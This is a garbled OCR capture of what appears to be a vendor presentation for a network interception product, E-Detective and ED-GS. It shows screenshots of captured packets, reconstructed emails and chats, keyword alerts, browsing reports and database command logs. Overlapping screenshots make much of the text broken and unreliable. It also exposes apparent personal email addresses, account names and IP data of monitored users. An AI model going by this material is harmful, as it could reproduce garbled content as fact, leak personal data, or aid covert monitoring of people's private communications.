1m gilet 192168.112 192168885 63578 161 ` 00-1A:80:5C-5B.DE — 00:507F:29:58:11 \ 120B 4 UDP 
2. Fl sei 192.168.1.50 192.168.1255 — 138 138 00:16:67:00:3C:56 — FF-FF-FF-FF-FF-FF Mo 4 UDP 
3. grated 192168.112 192168160 7737 443 00-1A:80:5C:5B:DE — 00-0A:12:03:06:B7 K 8 TCP 
FEE 
4. s Page Layout Formulas Data Review — View a p67 DO 3 EC -E=-EE-EE-EE- / / 
|General ~ ||| Ë) Conditional Formatting || 3Insert~ | E ~ | File Download 
5. Fe) - = $ m Kä *, — asss ob 2r n | e e re een 
= T e ES "a [777 Do you want to open or save this file? E 
6. ° DATETIME 


c D E G G H I š IE Name: UNKNOWN-20030101 xls 
SPORT DPORT SMAC DMAC PACKETS SIZE(Byte) PROTOCOL | 

hil Type: Microsoft Office Excel 97-2003 Worksheet 
2003-01-01 00:19 192.168.1.12 — 192.168.160 7386 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1513 TCP 
2003-01-01 00:19 192.168.1.12 — 192.168.1.60 7388 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 2441 TCP From: 192.168.1.60 


2003-01-01 00:19 192.168.1.12  192.168.1.60 7390 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1593 TCP 
2003-01-01 00:19 192.168.1.12 — 192. 168.1.60 7392 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1545 TCP 


2003-01-01 00:19 192.168.1.12 192.168.1.60 7394 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1545 TCP Sa | Cancel | 
2003-01-01 00:19 192.168.1.12 192.168.1.60 7396 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1353 TCP , s pave 


2003-01-01 00:19 192.168.1.12  192.168.1.60 7398 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1401 TCP 


™ 
«0/00 — C» Cn EWN | 


2003-01-01 00:19 192.168.1.12  192.168.1.60 7400 443 00:1A:80:5C-5B: 00:0A:12:03:06-B7 1321 TCP 
2003-01-01 00:19 192.168.1.12  192.168.1.60 7402 — 443 00:1A:80:5C-5B: 00:0A:12:03:06:87 1385 TCP 

10. 2003-01-01 00:19 192.168.112  192.168.1.60 7404 443 00:1:80:5C-5B: 00:0A:12:03:06:87 1401 TCP 
2003-01-01 00:19 192.168.1.12 — 192.168.1.60 7406 443 00:1A:80:5C-5B: 00:0A:12:03:06:87 1534 TCP Zh.  Whie files fromthe intemet — arene Slenicray cickeedi E 
2003-01-01 00:19 192.168.1.12 — 192.168.160 7408 443 00:1A:80:5C-5B: 00:0A-12:03:06:B7 1518 TCP = f c. the a miden d 

11. 2003-01-01 00:19 192.168.1.12  60.251.127.208 — 7412 — 443 00:1A:80:5C:5B: 00:50.7F 29:58:11 1534 TCP -80: Wy am your computer. ff you do not trust the source, open or 


2003-01-01 00:19 192.168.1.12 192. 168.1.60 7414 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 3865 TCP 
2003-01-01 00:19 192.168.1.12  192.168.1.60 7416 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 2505 TCP 
12 2003-01-01 00:19 192.168.1.12 192 168.1.60 7418 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 2361 TCP 

= 2003-01-01 00:19 192.168.1.12  192.168.1.60 7420 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1401 TCP 
2003-01-01 00:19 192.168.1.12  192.168.1.60 7422 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1449 TCP 


save this file. What's the risk? 


2003-01-01 00:19 192.168.1.12  192.168.1.60 7424 443 00:1A:80:5C-B: 00:0A:12:03:06:87 1417 TCP 

13. 2003-01-01 00:19 192.168.1.12 — 192.168.1.60 7426 443 00:1A:80:5C:5B: 00:0A:12:03:06:87 2297 TCP :80:5C:5B:DE 00:0A:12:03:06:B7 1.59K T TCP 
2003-01-01 00:19 192.168.1.12 — 192.168.1.60 7428 443 00:1A:80:5C:5B: 00:0A:12:03:06:87 2345 TCP 
2003-01-01 00:19 192.168.1.12 — 192.168.1.60 7432 443 00:1A:80:5C:5B: 00:0A:12:03:06:87 2329 TCP 

14. 2003-01-01 00:19 192.168.1.12 — 192.168.1.60 7431 443 00:1A:80:5C:5B: 00:0A:12:03:06:B7 1545 TCP :80:5C:5B:DE 00:0A:12:03:06:B7 2.31K ri TCP 


c 


Total 174 Total Page 9 Current Page 1 


Note: Turn on Unknown Capturing Module if necessary. Default is turn off. 


Admin: System Access Authority Assignment 


Authority — Visibility and Operation in Group (with User defined) 


1 Authority - Visibility 


Visibility group name : ] 


Default rules 


2 Authority - Operation 


© Allnon-visual © All visual 
The following exceptions 


Operation group name : 
Perform rules 


NoVisual recorded project agreement ` | NoVisibility search function | |NoVisibility report function NoVisibility system set 
E [a RECORD STATISTICS | NETWORK 

F] ACCOUNT F] SCHEDULE ` "INFORMATION 

PJ FULLTEXT 
DATA 
ASSOCIATION 


Read only recorded record 
7j Can read recorded content 


-] HITPRECONSTRUCT 
GAME 


m 

E 

E Can read set content 

E Can read and write(Delete setting ...) 


NOTIFICATION 


NoSet visibility IP Add Delete NoSet visibility Account Add Delete 


Storage | Reset | 


Storage Reset 


Authority Refresh Add user group 


NO Add Time User group name Functions 


. 
G rou ps Ww ith b 2008-12-19 11:44:16 Administrator Add User Delete 
5 2009-02-02 18:24:07 Technical Add User Delete 
U se rs ? 2009-02-02 18:32:58 Finance AddUser Delete 


2009-02-02 18:33:19 Logistics Add User Delete 
Total 4 Total Page 1 Current Page 1 


Export & Backup — Auto (by FTP) and Manual 


@ please check hd!. 
RE Hour Day Month Week Q Please ensure you have at least 700 MB free in HD 
- l ` ` ` Delete * |] Directory Name Size ISO 
- E 2008101307340 — 11M 
Status: — Stop © Start Select Directory : 
x F)  20081012204148 46M 
X * f 20081010162532 25M  20081010162532 2081010162532 iso (2008-10-13 09:31:10) 
iv POP3 4 SMTP "d IMAP i4; WEBMAIL-R 
iz; WEBMAIL-S iv; MSN ICQ W YAHOO 
Ridin Butane iv QQ v UT V SKYPE M IRC 
. p ategores: o GOOGLETALK & FTP i P2P (| GAME 

Categories ` [V] POP3 4| SMTP MAP @) HTTP-L Z! HTTP-C @) HTTP-D V VIDEO STREAM 

7] WEBMAIL-R V] WEBMAIL-S V| MSN o TELNET 

VICQ V] YAHOO doo 

zur Z SKYPE IRC ef 

ER alla Bree WE 

J| GAME V|HTTP-L V|HTTP-C š 

EHTTP-D BIVIDEO STREAM V) TELNET @ Please use FTP software to download the Backup ISO image ! 

Please use 'admin' as FTP login account. 
7] Delete the backuped recording data which expired | 1| days. — 7 
ES CDROM/DVD: Optiarc DVD RW AD-7530B ~ 
Auto (with FTP) Backup 
(4 FTP Login Information p 


@ This ISO image will be uploaded to the FTP and 
will be deleted in the ED system after backup ISO ! 


@ ON © OFF 
Ftp Host: 192.168.10.50 


Download ISO or Burn in to CD/DVD 


User : decision 


Password: nn Reserved Raw Data Files and Backup 
| Ges Reconstructed Data Comes with 
Backup Record : Download 


[..Submi | Reset || FIPtest | 


Hashed Export Function 


Alert and Notification — Alert with Content 


tà Alert List 


Create a New Alert 


€&2POP3 Key Word is CEO, Managing Director, Gen “Fw to: frankie@ed-system.sg 
$ SMTP Key Word is Price list.xls Sew to- frankie@ed-system.sg Modify 
Wé 1 RW Total 2 Total Page 1 Current Page 1 
[ Æ nepsy/1¥2.100.1.0u/generay commonynotmcationyrule_earcpnp - vvinaows internet Expiorer m" * m wg 3 —r aaa 
Create a New Alert ` 
Alert Parameters Forward to ° 
" Ee - CSCEEC ;| Alert configured from 
IMAP| Sender ~ Time is: 08 ~ : 00 ~~ 17 ~ : 00 + ©Allow © Deny r di ° 
SMTP| Key Word v price Time is: 08 + : 00 ~~ 17 + : 00 e Allow © Deny| frankie@ed-sysem.sg f iffe re nt Service 
WEBMAIL-R Sender ~ Time is: 08 ~ ; 00 ~~ 17 ~ : 00 ~ © Allow @ Deny A H d di 
WEBMAIL-S Sender hd Time is: 08 ~ : 00 ~~ 17 > : 00 > Allow © Deny Ë categories an iffe rent 
MSN User Account v Time is: 08 ~ : 00 +< 17 ~ ; 00 ~ O Allow © Deny d para meters such as key 
YAHOO} User Account v Time is: 08 +> : 00 ~~ 17 ~ : 00 ~ O Allow @ Deny As 
ICQ) User Account ~ Time is: 08 + : 00 ~~ 17 + : 00 + Allow © Deny / word, account, IP etc. 
QQ) User Account v Time is: 08 ~ : 00 ~~ 17 > : 00 > Allow © Deny G 
UT| User Account ~ Time is: 08 ~ ; 00 ~~ 17 ~ : 00 ~ © Allow @ Deny Ë 
SKYPE| User Account v Timeis: 08 ~v : 00 ~~ 17 ~ : 00 ~ Allow © Deny d 
GOOGLETALK| User Account v Time is: 08 ~ : 00 ~~ 17 > : 00 ~ Allow © Deny ü 
' IRC| User Account v Time is: 08 > ; 00 ~~ 17 ~ : 00 ~ O Allow 9 Deny / Alert can be sent to 
FTP| User Account e Time is: 08 >: 00 ~~ 17 sr 00 > Allow © Deny f 
e — EREERUEUE — 5 “| Administrator by Email 
GAME IP M Time is: 08 ~ : 00 +< 17 ~ : 00 ~ O Allow 9 Deny B A 
HTTPA| IP - Time is: 08 + : 00 ~~ 17 ~ : 00 + @Allow © Dem t or SMS (if SMS Gateway 
HTTP-C| IP S Time is: 08 ~ : 00 ~~ 17 ~ ; 00 ~ O Allow © Deny / ^ : 
mu a UM EM NE NC = a hi is available). 


Throughput alert function is also available! 


Search — Free Text, Condition, Association 


Complete Search — Free Text Search, Conditional Search, Similar Search 


É https//192168.10.60/ - Search All - Windows Internet Explorer E 


Search Parameters 


Date KE ç 
Time - - 


Search Category History Query, 


All 


Source IP 


Email Address |» sender riReceiver FICC BCC se 
‘Subject 
‘Webmail Type M em 


FTP Server 
FTP User 


P2P Tool Md 
` eps — = E. 
Game Name :| M E] 
1 
MSN Account : |2 & 
User Handle M Participants 
1 
ICQ Account 13 D 
BUser Handle F Participants 
1 
Yahoo Account : |2 * 
User Handle I” Participants 
1 
QQ Account : |2 a 


Conditional 
Search 


VIC-UPTOP 


Timer 
2006-05-21 14:54:00 
2008-05-21 15:02:35 
2008-05-21 15:32:38 
2008-05-21 15:34:13 
2008-0521 15:36:43 
2008-05-21 15:53:50 
2008-05-21 15:54:37 
2008-05-21 16:10:17 
2006-0521 16:10:18 
2008-05-21 16:11:17 
2008-05-21 16:38:19 
2008-05-21 16:38:21 
7008-05-21 163921 
2008-05-21 17:21:21 
2008-05-21 17:28:54 
«123456789 »» 


Categody 
Kg 


O BylP 
Setting Time 


Briefly 

Subject: Re: Normal-ED2-1.4.0-... 
Subject: Database Backup (32) 
Subject: Re: Normal-ED2-1.4.0-... 
stats update microsoft com 
Subject: Re: Normal-ED2-1.4 0-. 
Subject: Re: Normal-ED2-1.4 0-. 
Subject: Re: Norma-ED2-1.4.0-.. 
Subject: Re: Serial Number Req 
Subject: Re: Normal-E02-1.4.0-... 
Subject: Fw: Serial Number Req 
Subject: Re: Serial Number Req... 

Re: Serial Number Req 
Upload: raw_eth2 1211358686 


©) 0 Date-Time Account Sender Receiver cc Subject Sie — = 
1. [E 2008 07 O2 FRANKE: decision@ed-system s _ Manis s__Support@ed... H MY Email 9490K [7l 
2008 07 2 FRAMKE-docisiongyed.system s E misa sg £3 I Captured 9874K [1 
3. 9 2008 07 O2 pe decision@ed-system s Bee  Supportëed 2 H MY Email 94.91K O 
6 2008 07 DA FRA decision@ed-system s san s. Cà H New York 7937K TL 
5. F aM ogg pee Wedetective2@hotmail EMEN sg & H Africa 1450K [Cl 
SE SE ee decision@gma SE S £3 I Bush 724K [A 3 
T: 2008 07 Q2 FRANK ansyinmy@yahoo com s à G H Prospectors strike gold at | 422 DER [a 
SEI Deiere frankie frankie@decision.com... T com... decision@e. AH COLOMBEY-LES-DEUX-EGLISES...114 35K. [71 
9. Lk: frankie frankie@decision.com s s, Support@ed._.} H Europe - Econ Crisis 158.22K TL 
10. E SE frankie frankie@decision.com EE com... decisione... i COLOMBEY-LES-DEUX-EGLISES...114 37K fà 
2000-10-12 .. sg ma B ppe - Econ Crisis 158.18K [a E 
@By Account : VIC-TEST 
PO Corelntercept Lottery... eaa O 07 


: (2008-05-22 1 


Functions 


Association 


Association 


Total 563 Total Page 38 Current Page 1 


Association Account 
jimmy@decision.com.tw 
jylin@decision.com,tw 
lunke@decision, com.tw 
neoyuxxx@decision.com.tw 


ma 123 om 


Association IP 


Total 0 Total Page 0 Current Page 1 


"neger 


192.168.1.237 
jimmy 

bob 

tang0126 


Search Account 


——Ms n I—_T TV 


Total 12 Total Page 3 Current Page 2 


Total 12 Total Page 1 Current Page 1 


Free Text Search 


Association 
Search 


File Checksum (Hash) — Check File Content Integrity 


Di Refresh | File Name ; TUT186-Forensics. pdf 


No. File Name Extension Count Size Search 

3. ni-ieee.pdf pdf 1 334.83K e. 

2 network forensics on pack... pdf 1 240.91K E 

3 TUT186-Forensics.pdf pdf 1 884 GAR E 

4. 0409s2.pdf pdf 1 460.29K e. 

5 Hornyvalley.com Hardcore ... rar 1 33.63M E 
“415 


Total 5 Total Page 1 Current Page 1 


Es 
KI ! 


No. File Name Extension - 
1. TUT186-Forensics. pdf pdf 1 884 64K E 
TEE 


Total 1 Total Page 1 Current Page 1 


Shows the file lists and user can import files to check and compare with the files that 
has been captured by the system. 


Compare file content integrity. Abuser might have changed file name and send out 
the file to competitor. 


Bookmark Function (for Review & Retrieval Later) 


ee = 
PIPAN, eee misa 


BookMark “| Mf Delete | Š Search | ¿Account List Every Page 
— Á ) Date-Time Account Sender Receiver CC Subject Size SE 
Close i earch 
1. E going "sd jannie@fkyong.c EE & M tJ Re: Letters 9840K A § 
2. [] @ Se VIC-TEST frankie@decisio Kees S vincentyao £3 FJ e RE: Issues still exist 484.18K [^l a 
3 Fl 20090572 VIC-TEST lunkoQdecision PTS a © E Fw: 04other informatio... 932.66K [C] — | 
4 [T] 8 EDIT VIC-TEST lunko@decision.... «e @decision.co £g, (9 E) Fw: 06block non Sp" 1.03M Q 4 
50g porre FLYY  vincentyao@deci Leger :ü decision@d D E r2 £8 Ea 87.10K a a, 
6 [1 0 peer 192.168.1.142vincentyao@deci oes co decision@d ca e p ee 8636eK Il A 
7T. Oo Ü ernie VIC-TEST vincentyao@deci Sne - decision@d... Ü ' m 28 ad 8635K [Qd A 
8. [] 6 pude VIC-TEST flyyQdecision.c EE vincentyao £3 F) m RE: Issues still exist... 48925K [C] A 
Wa 123 ph Enter Page gm  w—àw— Total 20 Total Page 3 Current Page 1 
No. Remove Export Date Name Export ISO Name 
1 x È 2009-02-02 18:43:34 decision 
2 A 53 2009-02-02 18:43:19 singapore 
Wa 1» Total 2 Total Page 1 Current Page 1 


Bookmark items and allow the review of the items. 
Bookmark items can also be exported. 


Reporting — Network Service Usage - Daily 


Network Services Usage Report 


HTTP Download:4,0696 
MSN:8,6396 


QQ:3,296 . il 
WV Drill Down Reporting Capabilities 
HTTP Content:32,91% UT-10.6% 


` JÉHTTP Link | W Delete | R Search 
HTTP Link:33,6696 No. [T Date-Time Account HOST 
$. 2009-08-29 22:16:55 123 Seednet Webmail Isi a, 
2. 2009-08-29 22:16:52 123 Seednet Webmail [A a 
3 2009-08-29 22:16:52 lunko Welcome to ICQ a a, 
4. 2009-08-29 22:16:51 123 Seednet Webmail [Cl a, 
5 2009-08-29 22:16:50 lunko ICQ Inc.- Welcome! [a a 
6. CU 2009-08-29 22:16:49 lunko welcome.icq.com m a, 
y E 2009-08-29 22:16:49 lunko C.icq.com [a a, 
8. 2009-08-29 22:16:48 123 Seednet Webmail [a a, 
H 2009-08-29 22:16:48 peter YouTube - Mini-Z AWD Commercial a e l 
10. [J 2009-08-29 22:16:47 123 Seednet Webmail bal a, |! 
"1 2009-08-29 22:16:47 123 Seednet Webmail [a a 
12. 2009-08-29 22:16:47 123 webmail.seed.net.tw Fa a, 
13 2009-08-29 22:16:46 peter YouTube - Broadcast Yourself a a, 
14. [J 2009-08-29 22:16:44 123 Seednet Webmail a a, 
15 2009-08-29 22:16:43 peter YouTube - Broadcast Yourself. a a, 
46. 2009-08-29 22:16:41 peter YouTube - Broadcast Yourself bal a, 
17. 2009-08-29 22:16:39 123 Seednet Webmail T a, 
18. 2009-08-29 22:16:39 peter YouTube - Broadcast Yourself. [a a 
19. 2009-08-29 22:16:37 peter YouTube - Broadcast Yourself. a q 3 
20 Pn 2009-08-29 22-16-36 lunka edn atwola cam [a Au 


44 123456789 mm Enter Page Go Total 57,795 Total Page 2,890 Current Page 1 
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Reporting — Network Service Usage - Weekly 


Network Services Usage Weekly Report 


Drill Down Reporting Capabilities 


2009/08/24 


Network Service Usage Weekly Report 
HTTPPAGE 


2009/08/26 


2009/08/23 


2009/08/24 


2009/08/25 2009/08/25 2009/08/27 


2009/08/25 


2009/08/29 


Sum Content | W Delete | Q. Search 


Every Page 


N. E 
21 a 
22. [au] 


26. 
m 8 
2 D 
29. m 
s» A 
31 m 
32. 
33. m 
34. 
3. mH 
3€. m 
7 m 

[a] 

m 

m 


mu 123456789 » M Enter Page 


Date-Time 
2009-08-29 22:22:41 
2009-08-29 22:22:41 
2009-08-29 22:22:41 
2009-08-29 22:22:41 
2009-08-29 22:22:41 
2009-08-29 22:22:41 
2009-08-29 22:22:41 
2009-08-29 22:22:39 
2009-08-29 22:22:39 
2009-08-29 22:22:36 
2009-08-29 22:22:36 
2009-08-29 22:22:33 
2009-08-29 22:22:32 
2009-08-29 22:22:32 
2009-08-29 22:22:32 
2009-08-29 22:22:32 
2009-08-29 22:22:31 
2009-08-29 22:22:31 
2009-08-29 22:22:31 
2009-08-29 22-22-31 


Account 


peter 

peter 
123 
123 
123 
123 


Content 


(4% www freeworldgroup.com 
(awww freeworldgroup.com 
[a%PChome 

HI®PChome 

H®PChome 

H®PChome 

H®PChome 

IS ePChome 

IS bPChome 

IS bPChome 

ISÓbPChome 

135620010907 

EI bpagead2 googlesyndication.com 
IS bAdvertisement 

E bpagead2 googlesyndication.com 
H®Bugs Puzzle Puzzle Game - Play Free Flash Games Online - Youdagames.com 
I b Advertisement 

IS b Advertisement. 

Isl %pagead?2 googlesyndication.com 


f%nanead? nnnnlesundicatinn cam 


D 
m 
a 
a 
m 
a 
m 
ei 
fa 
m 
m 
m 
fa 
m 
ma 
m 
m 
m 
m 
m 


h 


RRBhRhbhRhphbhRhbhPhbhbhehbhbhbehRbp 


Total 56,971 Total Page 2,849 Current Page 2 


Whols 


Reporting — Top Websites Viewed (Users) 


Top Web Sites 
Weekly J Summary J 
Web Server URL Count User 
1  p4uhinet net 16,698 TOP N 
2  mailpchome.com.tw 3,305 TOP 
3 \sg2002. webmail hinet net 3.243 TOP @IP SACCOUNT Top Web Sites (Top N) 
4 sg2000.webmail hinet net 2.0000 TOP p iat 
s aceon 1.794| TOP Geer e Dee 
192.168.1.33 Relations 9.660 Daily Usage | Weekly Usage | 
6 |wm5.ulcomtw 1.794 TOP 192.168.1.10 EY 7,075| Daily Usage | Weekly Usage | 
7  |glal03.mail 163.com 1,725 
8  www.slimme.com.tw 1,587 TOP N 
9 mp.sina.com tw 1.518 TOP N [ @ hetps1/60.251.127-208/common/report/ree-php2iP=192.168... eie 
10 pagead2 googlesyndication com 1,380 TOPN Relationship between Account and IP 
11 webmail seed net. tw 1380 TOPN Address 
12 |www.google.com.tw 1362,  TOPN cd 
13 tw.youtube.com 1,311 TOPN 
14 www.flickr.com 1,310 TOP N 
15 tw.gofoxy. net 1.104 TOP N 
16 tw.messenger.yahoo.com 1.104 TOP N 
17 Htwsina alles com 965 TOP N @ Internet| Protected Mode: Off m 410% ~ 
18 |www-freeworldgroup.com 828 TOP N 


Reporting — Online IP — Account Lists 


Visibility Group : ALL 


Online IP List | Add/Delete | Set IP. | Import/Export IP | Skipped IP List | Search | Account Detection | Mail Report IB : 0 | Every Page : ES 


No. m Ca Status! User IP Client Search Server Search PC Name Account Last Connection Time ^ 
1. m P 1$ 192.168.1.19 C, CA SS DECISION-CASPER 2011-07-27 15:05:14 
2: m € 3116.14.50. C, C, n 116.14.50.39 2011-07-26 16:12:03 
3. A 1$211.21.62.67 IN C, we 211.21.62.67 2011-07-26 16:29:33 
4. m e 13$ 46.137.134.188 Q Q e 46.137.134.188 2011-07-26 16:12:49 
5. A 1$114.108.252.1 - 
6. S © 1$ 210.66.39.1 
T. m : 1$ 27.240.107. | 
8. m e 1$ 204.236.166 otal Throughput Statistical Report >> 192.166. gg rg wer [Month Statistical ws 
9. A 1$ 118.161.240. 
10 = 39449.13.32.2 2011-07 192.168.1.2 Throughput Month Statistical «Last Month © Next Month» Mail Report 

S s= SE Month Traffic 
Tt. o 3 124.108.79. Soe su Quantity Throughput Report 
12 m Bso 251.127.7 Total 1,751 148,080 KB 

? = sree EEE € POP3 0KB 
13. m 360.251.127.2 É IMAP 0KB 
4. m 1$ 192.168.1.1 pua Së 

= Lg Webmail(Read) 0KB 

15. zi 1$ 121.205.59. E] Webmail (Sent) OKB 
16. n 3116.15.90. Ra MSN ny 


«12345 » m Ener Page al 


ICQ 
"05 YAHOO 
A qo 
* SKYPE 
UT UT Chatroom 
:&^ GOOGLETALK 


H IRC Chatroom 


0 
0 
0 
0 
0 
0 
0 
0 
0 
1 
0 
0 
0 


0 KB 
0 KB 
0 KB 
19 KB 
0 KB 
0 KB 
0 KB 


Reports — Daily Excel Log Report (Packet Header) 


ey ld E 20110727 [Compatibility Mode] - Microsoft Excel 4 = LEI e? 
pica a u = 
Home Insert Page Layout Formulas Data Review View Nitro PDF Professional @ OO x 
ER A SCH = = ] LED m || Kä === = Autosum - A 
C N -]12 ~} P === r zy Wrap Text G I x 3 m em T 5 
=] By ourier New A A = š e Wrap Te: enera RE Ha — = == Lu z ER GI KH 
Paste Ip Z U-.| +. A~ rad M. & Center ~ - 9 |0 281 Conditional Format Cell Insert Delete Format Sort& Find & 
Y = SN = ——! $ fe cr [6 p.a Formatting ~ as Table ~ Styles ~ ` ` X <2 Clear ~ Filter" Select > 
Clipboard '« Font E Alignment E Number fs Styles Cells Editing 
Al X fs | Category Y 
A B [o D E F G H I J K 
1 Category y Quantity|y Throughput hy Quantitykiy Throughput|l quantity} Throughput 
2 POP3 1022 276569 KB 1425 382912 KB 1425 382912 KB SG 
H 3 IMAP 476 96 Os Y ld lodi. 20110727 [Compatibility Mode] - Microsoft Excel = = 
4 SMTP 541 310 = Home Insert Page Layout Formulas Data Review View Nitro PDF Professional [7] .0x 
5 Webmail (Read) 1674 sg 2 mem - 
ra A = - ass = - d k; (sap A = = Autosum - A š 
6 Webmail (Sent) 751 T EU = 1 "ës EF Wrap Tex General H g g g & ml "Lu a) dà i 
$ MSN 10 2| Paste ` Bodau- ~ &- Ay SE SS =a Merge & Center ~ $ - % 9 |%8 28 Conditional Format Cell Insert Delete Format Sort & Find & 
J X Z — — = — eg = “| Formatting ~ as Table ~ Styles ~ - Y X c2 Clear ~ Filter” Select > 
8 ICQ 2 A43ll clipboard © Font Ir Alignment Ir Number m Styles Cells Editing 
9 YAHOO 3 149 rer = Saal Date 
g 
dd QQ 7 zar A B C D E F G H 
11 SKYPE 2 41|1 Date | IP Address |Hostname| From | To cc | Hcc Subject - 
12 UT Chat Room 1 11|2 27/7/2011 15:04 |192 168.133 flyy Mailer-Dadfl dech | |[May Infected] Mail delivery failed: returning message to sender 
13 EEN i 3 | 27/7/2011 15:04 [192.168.1.10 |vic decision@|vic@decisi | Fwd:Fw: 02Schoolpolice-* |£ FX 8883 fis M 
- 4 27/7/2011 14:50 |192.168.1.33 |flyy vic @decis|flyy@decig | Fw: 04other information-Z& HSA iR M 
| 4 IRC Chat Room 2 5 | 27/7/2011 14:50 |192 4684133 |fyy [peter dedfyy decis | SRAA AEM 
15 FTP 522 2592|]| 6 | 27/7/2011 14:50 |192.168.1.33 |fiyy vincentyao|vic( decisidecision [ETE F) 
16 P2P 6 Se 7 | 27/7/2011 14:50 |192.168.1.33 |fiyy casper. kar|flyy@deciqking0613 Fw: 05Those arrested-75 EREE jir 
I 8 | 27/7/2011 14:50 |192.168.1.33 |fiyy Casper karflyy( decis king0613 Fw: 01northern lights found = rh 8386 SES P 
17 Telnet 137 Lo | 27/7/2011 14:50 [192.168.133 |fyy edetective(flyy@deciqking0613 Fw:05Those arrested-75 1 REE te 
18 HTTP Content 57424 gig] 10| 27/7/2011 14:50 |192.168.1.33 _|flyy edetective(flyy(Qdecidking0613 Fw:06block prom. Së 9 PE P ERU IE jir 
m 11, 27/7/2011 14:50 192 168.1 142 [peter vincentyao|vic Q decisi decision H8 E:sRlist F) 
19 U YUS a 3619 1654) 12 2777120111450 [1924681442 [peter _|rickwang@|peter@ded |[Bug 1255 A: IC sniff mod PDAS PALE ARP 9 Exe 
20 Video Stream 713| 102043 7 2777/2011 14:49 _[192.168.1.10 |vc peter@dedflyy@decid | EE ARAM 
21 HTTP Request 0 14, 27/7/2011 14:49 |192.168.1.10 we vincentyaolvic(Qdecisidecision RE Blast ) 
= s e 70 15 [ 27/7/2011 14:49 |192 468433 yy dec12345¢flyy@deciqking@yah FWD: 05Those arrested DERSE — 07 y 
16 27/7/2011 14:49 |192.168.133 |ñyy dec 12345¢flyy@decigking@yah FWD: 02School police-F1$ Fux # AMEE Pi 
23 VOIP 0 17| 27/7/2011 14:49 |192 468433 |iyy dec12345flyyQ decis kingQ)yah FWD: 04cther information-A MSA E jir 
24 Facebook 273 18, 27/7/2011 14:49 |192.168.1.33 |fyy casper. karftyydecidking0613 Fw: 05Those arrested-75 ERSP PI 
25 Twitter 204 di 27/7/2011 14:46 [1924681440 we decision@|vic@decis Fwd:Fw: 01northernlights found = rh 8786 BRR 6C 
20 27/7/2011 14:43 192.168.1.10 |vic flyy@decigfrankie@di vincentyao| RE: Issues still exists on EDDC 
26 Plurk 204 Sl] 21 27/7/2011 14:43 |192.168.19  |lunko _|jqbqftre60{m32168@|kshihwen | EE EE 
27 22 27/7/2011 14:43  |192.168.1.9 unko returnedm(returnedm( «9/228 SAR FR - ANNA SUHE KEK 5 ml = Hi « 3999» CarPlan TR s RRM « 26989 EE 
| 28 23 27/7/2011 14:43 |192.168.1.9  |lunko _| peter@dedflyy@decid SRSA TES 
M + » ^| Summary , POP3 IMAP HIE ," Webmail (Readif| 24 ` 27/7/2011 14:43 |192.168.1.9  |lunko ` |vincentyao|vicQ decisidecisiong] [NETS P 
Ready 25, 27/7/2011 14:43 [192.168.1.9 |lunko vic@decis|flyy@decig Fw: 04other information-Z& 06 A St 
- - - 26, 27/7/2011 14:43 |192 168.19  |lunko vic@decisifi decig 
27, 27/7/2011 14:43 192.168.1.9 unko 09520366 {lunko@deq 
28, 27/7/2011 14:43 |192.168.1.9  |lunko 09520366 {lunko@deq 
29 27/7/2011 14:43 |192.168.1.9 unko 09520366 {lunko@ded Mattes? 
30 27/7/2011 14:40 |192.168.1.33 |fyy vicGdecisiflyyGdecid Fw: 06block from-&BEfB PSH Ez [ 
31, 27/7/2011 14:40 |192.168.1.33 Wu edetective(flyy@deci king0613d Fw:01northern lights found Z PAY ac SE D 
32 _27/7/2011 14:38 192.168.133 "Bam |[May Infected] Mail delivery failed: returning message to sender 
33, 27/7/2011 14:37 _|192.168.1.10 Fwd:Fw: 02Schoolpolice-sah¢ RERAMA fs M 
34 27/7/2011 14:24 |192.168.1.33 d Fw: 04other information-z& ENS A St M 
WA KH Summary | POP3 IMAP, SMTP — Webmail (Read) . Webmail (Sent) — MSN , ICQ — YAHOO, QQ, SKYP( JN H 
Ready (EEE 10096 (—. 
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Wireline Ethernet Interception & Real- 
Time Reconstruction Series 
E-Detective Data Guard System (ED-GS) 


Introduction to ED-GS: For Internal Auditing 


> Enterprise Protection from Confidential Business Data 
Breach 


> Intranet Deployment at Gateway of Network Segment 
of Server Farm 


> Monitor Transactions of Heterogeneous Databases (MySQL, MS 
SQL, Oracle DB, DB2, Sybase) 


> Monitor File Access Activities of File Servers in MS Network 
(CIFS) 


> Monitor Internal Email Activities (POP3, SMTP, IMAP) 
> Transaction Record Provided for Audit 
> Personal Data Protection Mandates Fulfillment 


Introduction to ED-GS Features 


» DB Monitor on Transactions of MySQL, MS SQL Server and 
Oracle DB 


» SQL Command and Action Record with DB Name, User Account of 
Network and DB, User IP, Date/Time Stamp 


> Internal Email Activity Monitor & Audit 


» Email Content with Sender, cc & bcc List, User IP, Date/Time Stamp and 
Attached Files 


» Access Record and Audit of File Server 


» File Access Record with User Account, IP, File Server Name, Action, 
Date/Time Stamp 


> Full Text Search and Cross-Check 
» Online Warning Trigger by Keyword 


ED-GS Implementation 


- emm = á- mmm — 
-7 ~~ 
SS - 
Keep all activity records of s 
transactions, emails and file 


access for audit and monitoring 


ED-GS 
MENNEE 


— 
Dm ` wm — -— 


Mirror all 
inbound 
Client PCs and 


outbound 
data 


Switch/Router 


Server Farm with 
Database Servers, Email 
Server,ERP Server and 
File Servers 


Enterprise Data Guard System on Intranet 


Passive Operation 

No Impact on Network 
Performance 

No Effect on DB 

Well Integration with 
SIEM 

1 or 2 Tiers of 
Infrastructure for 
Optimization 

ED/GS Must Be 
Deployed between 
Servers and User Clients 
At the Gateway of 
Server Farm 

Acquire Data through 
Mirror or Forensic port 
of Switch/Router 


Sample — Database Commands Logging 


Every Page :[ 5j 


DB Similar 
Nd Command DB Types, arc Vi hols 


ort *"**"* 192.168.185 DE SELECT count(*) FROM WEBMAIL mysa M à 


‘© SQL | MDelete | ËŠPass Show | & Search 
Ho Cl Date-Time* Account 


2012-01-01 
11. O 03:32:53 
2012-01-01 
12. L] “93:30:53 
2012-01-01 
13. L1 “93:30:53 


hme Password Server? 


192.168.1.199 rg 


